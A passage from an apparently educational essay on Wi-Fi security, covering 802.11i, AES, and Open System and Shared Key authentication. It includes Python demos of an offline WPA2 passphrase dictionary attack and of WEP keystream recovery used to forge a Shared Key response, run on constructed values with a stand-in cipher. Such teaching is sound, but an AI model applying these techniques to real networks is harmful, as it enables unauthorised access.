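    eapol_zeroed = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(16) + snonce + bytes(60)
    # Legitimate station: PMK from the passphrase, KCK from the PTK, MIC over the frame.
    kck = pairwise_transient_key(wpa2_psk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_key_mic(kck, eapol_zeroed)
    # Attacker: only the over-the-air values plus a wordlist (constructed).
    wordlist = ["password", "letmein", "GTC-ICT-Staff", "summer2010", "Summer2010!"]
    return offline_dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist)

if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

This is the check to apply to a WPA2-Personal deployment such as a staff room WLAN: a short or guessable passphrase is recoverable from a single captured handshake, whereas WPA2-Enterprise gives each user an individual credential verified by the server and no shared secret to crack.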


802.11i

802.11i is an IEEE standard for wireless local area networks that provides improved encryption for networks using the popular 802.11a, 802.11b and 802.11g standards, which together make up Wi-Fi. 802.11i improves on the original wireless standard by defining a Robust Security Network (RSN). It specifies two new encryption protocols in place of WEP: the Temporal Key Integrity Protocol (TKIP) and CCMP, which is based on the Advanced Encryption Standard (AES).


Key Hopping

Key hopping is a technology that changes the encryption keys regularly to stop intruders from breaking the encryption. The network hops from one key to the next as often as every 3 seconds, so a key is replaced before any keystream reuse occurs and before an attacker can observe enough traffic under one key to mount an attack.

AES (Advanced Encryption Standard)

AES is the block cipher adopted by the 802.11i standard for the CCMP encryption protocol, replacing the RC4 stream cipher that WEP and TKIP rely on. AES has high performance and is capable of using cryptographic keys of 128, 192 or 256 bits to encrypt and decrypt data in blocks of 128 bits; CCMP uses a 128-bit key.


Wireless Gateway

A wireless gateway is a device that permits computers and other Internet-enabled devices to share an Internet connection. It provides the functions of a router, an access point and a firewall, replacing two devices (the router and the access point) with one. A wireless gateway is commonly placed between a wired WAN connection and the wireless LAN, or between wireless LANs.


Open System Authentication Vulnerabilities

Open System Authentication is a process in which no identity is verified: any station that asks is authenticated. A computer equipped with a wireless adapter can therefore authenticate to any access point that uses it, including one that also uses WEP, although without the WEP key it can only read frames that are sent unencrypted.

For Open System Authentication to work, the Service Set Identifier configured on the computer should match the Service Set Identifier of the wireless access point. The Service Set Identifier (SSID) is a sequence of up to 32 characters that names a Wireless Local Area Network; it is not a secret, since the access point broadcasts it in beacon frames.

A figure 2.2 showing Open system two-step authentication process [16]

Open system authentication involves a two-step authentication process:

The client transmits an authentication frame with the algorithm number indicating that Open System authentication should be used.

The access point receives the authentication frame and responds with a second authentication frame carrying the status code (success or failure); no credential is checked at any point.

Shared Key Authentication Vulnerabilities

Shared Key Authentication is the process by which a station gains access to a wireless network that uses the Wired Equivalent Privacy protocol; [11] defines it as requiring the client to encrypt, with the pre-shared WEP key, a challenge text sent by the AP. A station that completes shared key authentication can then associate and exchange WEP-encrypted data with the network. The weakness is that both the plaintext challenge and the ciphertext response are sent over the air, so an eavesdropper who captures the pair can XOR them to recover the RC4 keystream for that IV, and can then answer a later challenge from the AP without ever knowing the key.

Figure 2.3 showing Shared Key Authentication process (plaintext challenge, ciphertext response, key stream, eavesdropper listening)

Shared Key Authentication Process:

For shared key authentication to function, a WEP encryption key obtained in advance by the connecting computer must match a key stored at the wireless access point.

The client sends an authentication frame to the access point with the algorithm number indicating that Shared Key authentication should be used.

The access point randomly generates a 128-byte challenge text and sends it to the client in a second authentication frame.

The client encrypts the challenge text with the shared WEP key and returns it to the access point in a third authentication frame.

The access point decrypts the response with its own copy of the key and compares the result with the original challenge, then sends a fourth authentication frame with the outcome. If they are identical, the client passes the authentication. If not, the authentication fails.
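The added example below (not code from the essay) builds the 802.11 authentication frame bodies for both the Open System exchange and the four-frame Shared Key exchange described above, implements the access point's check of the encrypted challenge, and then plays the eavesdropper from Figure 2.3: it XORs the plaintext challenge with the ciphertext response to recover the keystream and uses that keystream to answer a fresh challenge without the key. The keystream() function is a stand-in for WEP's RC4 so that the block runs on its own; the key, IV and challenge texts are constructed.

```python
"""802.11 Open System and Shared Key authentication frame bodies, and the keystream
recovery an eavesdropper can perform against Shared Key authentication.  Added
example, not code from the essay.  Frame bodies follow the 802.11 Authentication
frame layout; keystream() is a stand-in for WEP's RC4 so the block runs alone,
and the key, IV and challenge texts are constructed."""
import hashlib
import struct
import zlib

OPEN_SYSTEM, SHARED_KEY = 0, 1     # Authentication Algorithm Number field
STATUS_SUCCESS = 0
CHALLENGE_TEXT_IE = 16             # Element ID of the Challenge Text information element

def build_auth_body(algo, seq, status=STATUS_SUCCESS, challenge=None):
    """Authentication frame body: algorithm(2) || sequence(2) || status(2) [|| Challenge IE]."""
    body = struct.pack("<HHH", algo, seq, status)
    if challenge is not None:
        body += bytes([CHALLENGE_TEXT_IE, len(challenge)]) + challenge
    return body

def parse_auth_body(body):
    algo, seq, status = struct.unpack("<HHH", body[:6])
    challenge = body[8:8 + body[7]] if len(body) > 8 and body[6] == CHALLENGE_TEXT_IE else None
    return {"algo": algo, "seq": seq, "status": status, "challenge": challenge}

def keystream(key, iv, n):
    """Stand-in for RC4(IV || key): a keystream determined only by (key, IV).  Not RC4
    itself (assumption for this example); the attack needs only keystream reuse."""
    blocks = (hashlib.sha256(key + iv + bytes([c])).digest() for c in range((n + 31) // 32))
    return b"".join(blocks)[:n]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_protect(key, iv, body):
    """Message 3 as sent over the air: IV || KeyID || (body || ICV) XOR keystream."""
    data = body + icv(body)
    return iv + b"\x00" + xor(data, keystream(key, iv, len(data)))

def ap_accepts_msg3(key, frame, expected_challenge):
    """AP side: decrypt with its key, verify the ICV, compare the challenge text."""
    iv, enc = frame[:3], frame[4:]
    data = xor(enc, keystream(key, iv, len(enc)))
    body, tag = data[:-4], data[-4:]
    if tag != icv(body):
        return False
    f = parse_auth_body(body)
    return f["algo"] == SHARED_KEY and f["seq"] == 3 and f["challenge"] == expected_challenge

def recover_keystream(msg2_body, msg3_frame):
    """Eavesdropper: message 3's plaintext is entirely known (fixed fields plus the
    challenge from message 2), so ciphertext XOR plaintext is the keystream for this IV."""
    known = build_auth_body(SHARED_KEY, 3, STATUS_SUCCESS, parse_auth_body(msg2_body)["challenge"])
    known += icv(known)
    return msg3_frame[:3], xor(msg3_frame[4:], known)

def forge_msg3(iv, ks, new_challenge):
    """Attacker answers a fresh challenge with the recovered keystream and the same IV."""
    body = build_auth_body(SHARED_KEY, 3, STATUS_SUCCESS, new_challenge)
    return iv + b"\x00" + xor(body + icv(body), ks)

def demo(wep_key=b"\x01\x02\x03\x04\x05"):
    # Open System: request and response, nothing to verify.
    open_resp = build_auth_body(OPEN_SYSTEM, 2, STATUS_SUCCESS)
    open_ok = parse_auth_body(open_resp)["status"] == STATUS_SUCCESS
    # Shared Key: a legitimate station authenticates while an eavesdropper listens.
    challenge = bytes(range(128))                       # constructed 128-byte challenge
    msg2 = build_auth_body(SHARED_KEY, 2, STATUS_SUCCESS, challenge)
    iv = b"\x0a\x0b\x0c"
    msg3 = wep_protect(wep_key, iv, build_auth_body(SHARED_KEY, 3, STATUS_SUCCESS, challenge))
    legit_ok = ap_accepts_msg3(wep_key, msg3, challenge)
    # Eavesdropper recovers the keystream and answers a new challenge without the key.
    iv_seen, ks = recover_keystream(msg2, msg3)
    new_challenge = bytes(reversed(range(128)))
    forged_ok = ap_accepts_msg3(wep_key, forge_msg3(iv_seen, ks, new_challenge), new_challenge)
    return {"open": open_ok, "legit": legit_ok, "forged_without_key": forged_ok}

if __name__ == "__main__":
    print(demo())
```

The AP in this exchange cannot tell the forged response from a genuine one, which is why Shared Key authentication is considered weaker than Open System authentication combined with a proper key-exchange such as 802.1X: it hands every listener a known plaintext/ciphertext pair for free.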